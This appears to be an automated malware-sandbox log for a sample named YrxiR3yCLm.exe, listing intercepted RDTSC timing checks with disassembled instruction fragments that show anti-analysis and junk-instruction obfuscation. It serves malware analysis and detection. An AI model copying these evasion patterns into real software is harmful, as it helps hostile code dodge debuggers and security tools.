Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA48EE second address: FA491C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C8h 0x00000007 je 00007F1174CFE2BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA491C second address: FA4922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA4922 second address: FA492B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA492B second address: FA4935 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA4935 second address: FA493B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA776E second address: FA7784 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11753296ACh 0x00000008 jl 00007F11753296A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA7784 second address: FA77B0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1174CFE2BDh 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ebx 0x00000015 ja 00007F1174CFE2B8h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA77B0 second address: FA77ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F11753296A6h 0x0000000a popad 0x0000000b jmp 00007F11753296B7h 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F11753296B0h 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA78EA second address: FA7918 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F1174CFE2C7h 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F31CCB second address: F31CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB10BD second address: FB10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB1600 second address: FB1604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB1604 second address: FB162F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push esi 0x0000000e jc 00007F1174CFE2B6h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB162F second address: FB1656 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F11753296ACh 0x0000000c pushad 0x0000000d jmp 00007F11753296B2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB5F4F second address: FB5F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB6091 second address: FB6098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB69D9 second address: FB69DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB69DF second address: FB69E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB69E9 second address: FB69ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB6B49 second address: FB6B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB6B4F second address: FB6B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FB6B54 second address: FB6B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBEA1A second address: FBEA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F74314 second address: F74338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jg 00007F11753296A6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F74338 second address: F5AFF7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1174CFE2B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D3705h] 0x00000011 call dword ptr [ebp+122D1FE6h] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F748BB second address: F74946 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F11753296B9h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 4AA58D00h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F11753296A8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c call 00007F11753296AAh 0x00000031 add dword ptr [ebp+122D190Fh], ecx 0x00000037 pop edx 0x00000038 mov ecx, dword ptr [ebp+122D1B1Fh] 0x0000003e call 00007F11753296A9h 0x00000043 jmp 00007F11753296B3h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F11753296B1h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F74946 second address: F74951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1174CFE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F74BEF second address: F74C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F74C0B second address: F74C20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1174CFE2C0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7567F second address: F7568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7568D second address: F75691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7576B second address: F75770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75770 second address: F75775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75775 second address: F5BB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F11753296A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+1248A02Eh] 0x0000002c jne 00007F11753296ACh 0x00000032 push eax 0x00000033 jmp 00007F11753296ABh 0x00000038 mov dword ptr [esp], eax 0x0000003b jl 00007F11753296ACh 0x00000041 mov edi, dword ptr [ebp+122D1FE1h] 0x00000047 call dword ptr [ebp+122D2282h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F11753296B5h 0x00000054 jo 00007F11753296ACh 0x0000005a ja 00007F11753296A6h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBDB4C second address: FBDB52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBDE72 second address: FBDE7C instructions: 0x00000000 rdtsc 0x00000002 je 00007F11753296B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBDE7C second address: FBDE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBDFD1 second address: FBDFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11753296B4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE30C second address: FBE318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1174CFE2B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE318 second address: FBE356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F11753296AFh 0x00000010 jmp 00007F11753296B7h 0x00000015 popad 0x00000016 jmp 00007F11753296ACh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE356 second address: FBE35C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE35C second address: FBE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE362 second address: FBE389 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1174CFE2B6h 0x00000008 jmp 00007F1174CFE2C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE638 second address: FBE63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FBE63C second address: FBE641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC493B second address: FC4963 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11753296A6h 0x00000008 jp 00007F11753296A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F11753296B8h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F11753296B0h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC4963 second address: FC496B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC496B second address: FC496F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC496F second address: FC4975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC50D2 second address: FC50DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F11753296A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC50DC second address: FC50E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC50E0 second address: FC5114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F11753296B4h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F11753296A6h 0x00000016 jg 00007F11753296A6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007F11753296A6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC5114 second address: FC511F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FC5B7B second address: FC5B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11753296ABh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F2E80C second address: F2E813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F2E813 second address: F2E81D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F11753296ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE312 second address: FCE318 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE318 second address: FCE31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE31E second address: FCE32D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1174CFE2B6h 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCDE63 second address: FCDE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F11753296A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCDFEF second address: FCDFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCDFF5 second address: FCE00D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B2h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE00D second address: FCE025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE025 second address: FCE029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE029 second address: FCE044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE044 second address: FCE05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F11753296B4h 0x0000000c jmp 00007F11753296AEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FCE05E second address: FCE079 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1174CFE2C4h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F27C15 second address: F27C1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD0A87 second address: FD0ACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C9h 0x00000007 jng 00007F1174CFE2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jo 00007F1174CFE2B6h 0x00000016 jmp 00007F1174CFE2C9h 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD0ACB second address: FD0AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD0AD1 second address: FD0AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD623B second address: FD6240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD6240 second address: FD6263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1174CFE2BDh 0x00000008 jbe 00007F1174CFE2B6h 0x0000000e jne 00007F1174CFE2B6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD6533 second address: FD653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F11753296A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD653D second address: FD655C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1174CFE2BEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD655C second address: FD6573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B1h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD6C65 second address: FD6C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD6C6F second address: FD6C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FD6C75 second address: FD6C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1174CFE2B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FDA2EE second address: FDA2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FDA2F6 second address: FDA2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FDA2FE second address: FDA316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 js 00007F11753296B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F11753296A6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F3523A second address: F3523E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F3523E second address: F35263 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F11753296B8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F35263 second address: F35267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F35267 second address: F35281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F35281 second address: F35286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FDEA9C second address: FDEAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F11753296A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FDEAA6 second address: FDEABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
